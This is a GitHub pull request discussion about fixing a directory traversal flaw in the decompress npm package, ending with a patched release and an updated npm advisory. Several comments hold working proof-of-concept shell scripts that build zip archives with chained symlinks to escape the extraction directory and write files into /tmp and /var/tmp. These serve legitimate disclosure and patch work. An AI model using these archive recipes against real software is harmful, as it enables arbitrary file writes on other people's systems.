kevva / decompress

Extracting archives made easy
MIT License
415 stars 51 forks source link

Prevent directory traversal #73

Closed trptcolin closed 4 years ago

trptcolin commented 4 years ago

This fixes #71 by throwing, rather than allowing paths outside the output directory to be extracted.

I believe this loud failure to be the correct one, as it behaves similarly to tar -zxvf in protecting against directory traversal:

$ tar -zxvf fixtures/slipping.tar.gz
x ../../../decompress-traversal.txt: Path contains '..'
tar: Error exit delayed from previous errors.

But since this package seems to be fairly widely used, I want to call out explicitly that I don't know all the use cases and who this loudly-failing implementation might end up breaking.

The fixture I swapped in contains a single file, pathed at ../../../decompress-traversal.txt (containing the text "DIRECTORY TRAVERSAL"). Prior to this fix, that file got created by the included unit test, and afterwards it does not get created.

Update: There are several other test cases added as well (see the comments below), involving symlinks, directories, and other situations.

I also needed to update some setup and testing things to get the tests passing since the linting/testing tools are at version "*", but tried to keep the commits separate in case you'd prefer cherry-picking.

trptcolin commented 4 years ago

Ah, something I just realized, before signing off for the night: I think a filename like “stuff..txt” would trigger this implementation’s throw. I don’t know how common those are or how tar handles it, but that case seems like unnecessary breaking. IMO best to handle that case before merging (or at least before releasing).

ajpyatakov commented 4 years ago

I did some googling and found the patch that resolves this issue in tar: When extracting, skip ".." members Here is the implementation of "contains_dot_dot" function: contains_dot_dot

I'm not so proficient in C, but I think that implementation in tar only checks for those dot-dot sequences that are before the slash, or at the end of the file. At least, that's how I understand this line: if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2])) return 1;

I hope that might be helpful.

alexanderkogan commented 4 years ago

I tried my hand at a fix, but I'm not sure how to add it to this PR or if I should at all... See the branch here: https://github.com/alexanderkogan/decompress/tree/directory-traversal-patch Can anybody advise me on this?

ashalliants commented 4 years ago

that patch wont work, as if the file name is just 'x' it will bomb out as not being able to access char [1]

alexanderkogan commented 4 years ago

that patch wont work, as if the file name is just 'x' it will bomb out as not being able to access char [1]

trptcolin was matching regular expressions though. The char array checks are from tar.

trptcolin commented 4 years ago

Agreed that a filename x has no issues with this implementation. I added a check for the case I was thinking of (e.g. internal_dots..txt or even sample..).

Two edge cases I'm not sure about:

magicOz commented 4 years ago

The problem is not only related to path names containing .., as this package also supports symlinks. An archive containing a symlink pointing outside the extracting location is able to bypass this check.

PoC: slip.zip (Creates a file in /tmp/slipped_zip.txt)

trptcolin commented 4 years ago

@magicOz Good point. I've updated the PR to traverse symlinks and handle the PoC you attached, and this feels more complete.

What's here prevents files and symlinks from being written outside the given output directory, but does not prevent new folders from being created.

trptcolin commented 4 years ago

This now prevents files/symlinks/directories from being created outside the given output directory.

So I've now handled all the cases I know about.

trptcolin commented 4 years ago

Last two commits were updating tests for the build.

@kevva - thoughts on merging / releasing? It’s possible that this could break consumers who are depending on the current behavior of decompress (allowing writing to arbitrary filesystem locations), so IMO should have a major version bump.

lauriejones commented 4 years ago

Thanks Colin! I'm totally unqualified to critique, and I'm not sure if it is possible to avoid, but fixing the vulnerability with a major version bump makes flushing the fix through package ecosystem much more difficult.

I remember this package being fixed with a new 3.0.0 version and still causing trouble for people getting their builds back to green: https://github.com/TooTallNate/node-https-proxy-agent/issues/84

This vulnerability is affecting me through this dependency graph (so a few packages that would need to update):

gatsby-plugin-sharp > imagemin-mozjpeg > mozjpeg > bin-wrapper > download > decompress

If the fix can be made with a minor version bump I think a lot of people would be really appreciative!!

Alternatively, I see download and bin-wrapper are both also owned by @kevva. Could they pull the major-bumped decompress in with only a minor bump themselves? Getting into tricky semver territory there though 😅

magicOz commented 4 years ago

@trptcolin That looks better! :+1:

However, the check currently only applies for the dirname of the file's path (index.js#L76). Which means that, by creating a symlink directly to our target file - it is possible to bypass this.

PoC:

mkdir generic_dir
ln -s ../ generic_dir/symlink_to_parent_dir
ln -s /tmp/slipped_zip_2.txt slipped_zip_2.txt

zip --symlinks slip2.zip slipped_zip_2.txt
zip --symlinks -g slip2.zip generic_dir/symlink_to_parent_dir

rm slipped_zip_2.txt

echo "Zip that slipped again" > slipped_zip_2.txt

zip --symlinks -g slip2.zip generic_dir/symlink_to_parent_dir/generic_dir/symlink_to_parent_dir/[...]/slipped_zip_2.txt

slip2.zip (Will create a file in /tmp/slipped_zip_2.txt).

Replacing path.dirname(dest) with only dest, should do the trick. :)

trptcolin commented 4 years ago

Thanks for the continued research @magicOz!

Yep, definitely some tradeoffs @lauriejones.

Just to set expectations, I’m not going to be able to spend time on this today. If somebody else wants to run with this, I’m happy to close this PR.

trptcolin commented 4 years ago

OK, one last commit before heading to the office, but haven't applied it to this PR because I'm suspicious of it.

https://github.com/trptcolin/decompress/commit/795aa696b49c07be668ac8560cc323eacd1c4ffb

Details: fs.realpath will fail for a file that's about to be created, so I did something a little different than fs.realpath(dest): dest.indexOf(realOutputDir) !== 0. That makes the tests happy, but the fact that I'm checking a realpath result against a path.join result makes me worry those could be different in good cases, which would be a bug.

Food for thought if somebody else picks this up from here.

trptcolin commented 4 years ago

Pushed an updated commit on my lunch break. My previous linked attempt was definitely a bug, and I added a test case preventing it.

The most recent escape was because when applied to a path containing a symlink, fs.writeFile will write to the place that symlink points. That's now patched on this PR.

@magicOz what do you think?

magicOz commented 4 years ago

@trptcolin Yeah, that looks like a healthy thing to do. But maybe check the realpath of the symlink as well?

I was able to bypass this by chaining 2 symlinks together and using an absolute path to the second symlink, since realOutputPath will be an absolute path, index.js#L86. This means that if the full path of where the archive is being extracted is known to the attacker, it is bypassable.

Consider this case; the archive is being extracted to /tmp/dist.

const decompress = require('decompress');

decompress('slip3.zip', '/tmp/dist').then(files => {
    console.log('done!');
});

Payload:

ln -s /tmp/dist/second_link first_link
ln -s /var/tmp/slipped_zip_3.txt second_link

mkdir generic_dir
ln -s ../ generic_dir/symlink_to_parent_dir

zip --symlinks slip3.zip first_link
zip --symlinks -g slip3.zip second_link
zip --symlinks -g slip3.zip generic_dir/symlink_to_parent_dir

rm first_link
rm second_link

echo "Zip that slipped again and again" > first_link

zip --symlinks -g slip3.zip $(python -c "print('generic_dir/symlink_to_parent_dir/'*30)")first_link

rm first_link
rm -r generic_dir
$ cat /var/tmp/slipped_zip_3.txt
cat: /var/tmp/slipped_zip_3.txt: No such file or directory

$ node poc.js 
done!

$ cat /var/tmp/slipped_zip_3.txt
Zip that slipped again and again

slip3.zip (Creates a file in /var/tmp/slipped_zip_3.txt this time)

trptcolin commented 4 years ago

@magicOz Thanks! Yeah, it's unfortunate that fs.realpath only works for files that already exist. Because in this case, we're worried about the location where a file will be created. And fs.realpath won't help with that.

My current idea, after realizing that won't work, is to walk symlinks recursively, checking for an escape - but then that also needs something to check for cycles, to avoid an infinite loop. Ideas on something simpler here would be very welcome.

BTW, thanks for that script - I had to tweak a couple things (only 25 repetitions of the magic escaping directories instead of 30, and swapping in /private/tmp for /tmp since I have some symlinking going on around there).

trptcolin commented 4 years ago

It got really complicated to try and follow all symlinks, since at any step they may be relative or absolute, missing or not. And I'm generally very concerned about creating bugs for legitimate archives, particularly since there aren't boatloads of test archives in the suite.

So I'm inclined to say: if a symlink exists at the path where we're trying to write file contents - go ahead and fail, rather than writing those file contents through to wherever the symlinks may ultimately resolve (potentially to a brand-new file). That's what I've done in the next-to-latest commit (the latest, well... see the above note about /tmp vs. /private/tmp).

ralf57 commented 4 years ago

Is this PR ready to be merged?

ralf57 commented 4 years ago

@kevva would it be possible to have this merged?

timmywil commented 4 years ago

@sindresorhus I noticed some direct commits from you. Do you still have commit access? Perhaps @kevva wouldn't mind if you merged this and did a release. ❤️

jimmyandrade commented 4 years ago

I was wondering that would be great if @kevva allowed this repo to be moved to an org or something like this, so that more people from open source community could contribute... and - as @kevva seems to be a very busy person - so he/they didn't need to have anymore the responsibility to maintain code and respond to our pull requests.

soundstep commented 4 years ago

@kevva Any news on this? Is this mergeable?

NeoTheThird commented 4 years ago

I think @jimmyandrade 's suggestion is reasonable. It's been a month, and a billion projects are depending on this. It would be great to hear from @sindresorhus, if we can't get a direct comment from @kevva. But we should do something soon, or else we'll have a bunch of rogue forks in a months time. It's MIT-licensed, so we should be able to move on this together. Maybe we give it another week and then take a vote or something?

thasmo commented 4 years ago

Just found this and was wondering if @kevva or @sindresorhus could help moving this forward. Thanks a lot!

sindresorhus commented 4 years ago

Someone sent me this on Twitter now. I'm not subscribed to this repo nor am I a maintainer, but it looks like I have merge and npm access, so I'll publish a patch version. However, I would consider this package deprecated.

sindresorhus commented 4 years ago

Done: https://github.com/kevva/decompress/releases/tag/v4.2.1

mikeborozdin commented 4 years ago

@sindresorhus ,

Thank you so much!

Now, the NPM advisory says that version 4.2.1 is still vulnerable. How we make it know that it's actually not?

WebReflection commented 4 years ago

I have zero issues to fix after this update, is npm audit still bothering you?

neverendingqs commented 4 years ago

I'm also seeing issues in both the NPM advisory and with npm audit.

How does NPM advisory get updated?

neverendingqs commented 4 years ago

I'm also seeing issues in both the NPM advisory and with npm audit.

How does NPM advisory get updated?

I asked on Twitter, and can report back when I get a reply

timmywil commented 4 years ago

I emailed the security team at npm. I think they'll be able to update the advisory.

andreeleuterio commented 4 years ago

Hi folks, Andre from the npm security team here. The advisory is updated with decompress >= 4.2.1 marked as unaffected. We sincerely thank everyone involved in this effort.

ksze commented 4 years ago

GitHub's dependabot isn't marking this update as a security update. Any idea how you can make that happen?